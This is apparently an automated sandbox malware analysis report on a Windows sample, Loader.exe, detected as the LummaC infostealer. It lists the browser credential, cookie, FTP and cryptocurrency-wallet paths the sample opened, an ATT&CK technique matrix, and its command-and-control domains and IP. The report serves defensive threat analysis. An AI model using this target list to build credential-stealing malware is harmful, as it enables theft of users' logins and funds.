Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 504, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Loader.exe PID: 504, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	3 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Loader.exe	37%	ReversingLabs	Win32.Trojan.Generic
Loader.exe	32%	Virustotal		Browse
Loader.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://volcanohushe.click/api$P	0%	Avira URL Cloud	safe
https://volcanohushe.click/T	0%	Avira URL Cloud	safe
https://volcanohushe.click:443/apik	0%	Avira URL Cloud	safe
https://volcanohushe.click/api	0%	Avira URL Cloud	safe
https://volcanohushe.click/ts/M	0%	Avira URL Cloud	safe
https://volcanohushe.click/%app	0%	Avira URL Cloud	safe
https://volcanohushe.click:443/apiXMVQGAH.xlsxH	0%	Avira URL Cloud	safe
https://volcanohushe.click/	0%	Avira URL Cloud	safe
volcanohushe.click	0%	Avira URL Cloud	safe
https://volcanohushe.click/api2K	0%	Avira URL Cloud	safe
https://volcanohushe.click:443/api	0%	Avira URL Cloud	safe
https://volcanohushe.click/M??	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
volcanohushe.click	172.67.145.201	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wordyfindy.lat	false		high
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
shapestickyr.lat	false		high
talkynicer.lat	false		high
https://volcanohushe.click/api	true	Avira URL Cloud: safe	unknown
bashfulacid.lat	false		high
volcanohushe.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/T	Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://volcanohushe.click:443/apik	Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/	Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://volcanohushe.click/%app	Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://volcanohushe.click:443/apiXMVQGAH.xlsxH	Loader.exe, 00000003.00000003.2325175528.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/api$P	Loader.exe, 00000003.00000003.2324626659.0000000000B11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/t	Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409099739.0000000000AF5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/ts/M	Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/api2K	Loader.exe, 00000003.00000003.2299745097.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330397824.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409137229.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2300072128.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298552259.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298638638.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2325175528.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330501381.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.mozilla.or	Loader.exe, 00000003.00000003.2266368076.00000000033CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click:443/api	Loader.exe, 00000003.00000003.2298552259.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299745097.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://volcanohushe.click/M??	Loader.exe, 00000003.00000003.2205684949.0000000000A91000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.145.201	volcanohushe.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580145
Start date and time:	2024-12-24 02:16:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/1@1/1
EGA Information:	Successful, ratio: 100%
